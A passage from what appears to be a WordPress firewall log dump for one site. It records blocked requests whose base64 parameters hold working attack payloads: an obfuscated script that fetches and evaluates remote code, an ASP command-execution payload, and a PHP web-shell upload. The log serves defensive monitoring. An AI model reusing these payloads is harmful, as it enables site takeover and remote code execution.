Safari/537.36','blocked:waf','Total Donations (all known versions) - Multiple Unauthenticated AJAX Actions','{\"learningMode\":0,\"failedRules\":\"129\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37805,1569949593.185904,1569949591.518800,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W290d19wY3RsX2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC90ZXh0YXJlYT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWEqLywxMTYvKl9hYWFhYWEqLywxMTYvKl9hYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYSovLDU4LypfYWFhYWFhKi8sNDcvKl9hYWFhYWEqLyw0Ny8qX2FhYWFhYSovLDEwMy8qX2FhYWFhYSovLDEwOC8qX2FhYWFhYSovLDk3LypfYWFhYWFhKi8sMTE1LypfYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWEqLywxMDgvKl9hYWFhYWEqLyw5Ny8qX2FhYWFhYSovLDExNi8qX2FhYWFhYSovLDEwMS8qX2FhYWFhYSovLDExNC8qX2FhYWFhYSovLDk4LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYSovLDExNS8qX2FhYWFhYSovLDExNi8qX2FhYWFhYSovLDEwNC8qX2FhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sNDYvKl9hYWFhYWEqLyw5OS8qX2FhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWEqLyw5Ny8qX2FhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhKi8sMTA4LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sOTcvKl9hYWFhYWEqLywxMTQvKl9hYWFhYWEqLyw0Ni8qX2FhYWFhYSovLDEwNi8qX2FhYWFhYSovLDExNS8qX2FhYWFhYSovLDYzKTt2YXIgX2FhYWFhYSA9IF9hYWFhYWEoX2FhYWFhYSk7aWYoX2FhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhKF9hYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYShfYWFhYWFhKXsgdmFyIF9hYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhLCBmYWxzZSApO19hYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37890,1570544530.255243,1570544529.412100,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//config/AspCms_Config.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2Fd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9jb25maWcvQXNwQ21zX0NvbmZpZy5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37884,1570544460.419095,1570544459.585200,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//Templates/test.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2hhbnl1XQ==\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9UZW1wbGF0ZXMvdGVzdC5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37804,1569949597.944537,1569949596.876200,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W290d19wY3RsX2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC90ZXh0YXJlYT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWEqLywxMTYvKl9hYWFhYWEqLywxMTYvKl9hYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYSovLDU4LypfYWFhYWFhKi8sNDcvKl9hYWFhYWEqLyw0Ny8qX2FhYWFhYSovLDEwMy8qX2FhYWFhYSovLDEwOC8qX2FhYWFhYSovLDk3LypfYWFhYWFhKi8sMTE1LypfYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWEqLywxMDgvKl9hYWFhYWEqLyw5Ny8qX2FhYWFhYSovLDExNi8qX2FhYWFhYSovLDEwMS8qX2FhYWFhYSovLDExNC8qX2FhYWFhYSovLDk4LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYSovLDExNS8qX2FhYWFhYSovLDExNi8qX2FhYWFhYSovLDEwNC8qX2FhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sNDYvKl9hYWFhYWEqLyw5OS8qX2FhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWEqLyw5Ny8qX2FhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhKi8sMTA4LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sOTcvKl9hYWFhYWEqLywxMTQvKl9hYWFhYWEqLyw0Ni8qX2FhYWFhYSovLDEwNi8qX2FhYWFhYSovLDExNS8qX2FhYWFhYSovLDYzKTt2YXIgX2FhYWFhYSA9IF9hYWFhYWEoX2FhYWFhYSk7aWYoX2FhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhKF9hYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYShfYWFhYWFhKXsgdmFyIF9hYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhLCBmYWxzZSApO19hYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"Lw==\",\"category\":\"xss\",\"ssl\":1}'),(37907,1570674421.149511,1570674420.184400,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//Templates/test.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2hhbnl1XQ==\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9UZW1wbGF0ZXMvdGVzdC5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37906,1570674423.371849,1570674422.206200,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//admin/Admin_Ta.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Bhc3Nd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9hZG1pbi9BZG1pbl9UYS5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37905,1570674426.183565,1570674424.697800,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//admin/error.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25peWFkZV0=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9hZG1pbi9lcnJvci5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37904,1570674428.433930,1570674427.172300,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//admin/images/Sql.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3JtYl0=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9hZG1pbi9pbWFnZXMvU3FsLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37903,1570674430.959379,1570674429.813200,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//admin/sdfg.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2Fd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9hZG1pbi9zZGZnLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37926,1570778626.693338,1570778622.050000,'\0\0\0\0\0\0\0\0\0\0ÿÿ.ic£',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":0}'),(37929,1570907958.024824,1570907957.096900,'\0\0\0\0\0\0\0\0\0\0ÿÿprh†',0,403,0,0,0,'http://bintara.com.my//index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data%3Aimage%2Fphp%3Bbase64%2CeGJzaGVsbCUzQyUzRnBocCUwQSUyNHN0JTIwJTNEJTIwQGNyZWF0ZV9mdW5jdGlvbiUyOCUyNyUyNyUyQyUyMCUyNF9QT1NUJTVCJTI3aHhxOTkxMjE3JTI3JTVEJTI5JTNCJTBBJTI0c3QlMjglMjklM0I%3D','http://bintara.com.my//index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,eGJzaGVsbCUzQyUzRnBocCUwQSUyNHN0JTIwJTNEJTIwQGNyZWF0ZV9mdW5jdGlvbiUyOCUyNyUyNyUyQyUyMCUyNF9QT1NUJTVCJTI3aHhxOTkxMjE3JTI3JTVEJTI5JTNCJTBBJTI0c3QlMjglMjklM0I=','Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"ZGF0YTppbWFnZS9waHA7YmFzZTY0LGVHSnphR1ZzYkNVelF5VXpSbkJvY0NVd1FTVXlOSE4wSlRJd0pUTkVKVEl3UUdOeVpXRjBaVjltZFc1amRHbHZiaVV5T0NVeU55VXlOeVV5UXlVeU1DVXlORjlRVDFOVUpUVkNKVEkzYUhoeE9Ua3hNakUzSlRJM0pUVkVKVEk1SlROQ0pUQkJKVEkwYzNRbE1qZ2xNamtsTTBJPQ==\",\"path\":\"Ly9pbmRleC5waHA=\",\"category\":\"xss\",\"ssl\":0}'),(37991,1571334700.327736,1571334699.319700,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?page=yuzo-related-post',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Related Posts <= 5.12.90 - Missing Authentication','{\"learningMode\":0,\"failedRules\":\"137\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25hbWVfb3B0aW9uc10=\",\"paramValue\":\"eXV6b19yZWxhdGVkX3Bvc3Q=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37977,1571334050.671309,1571334049.464900,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 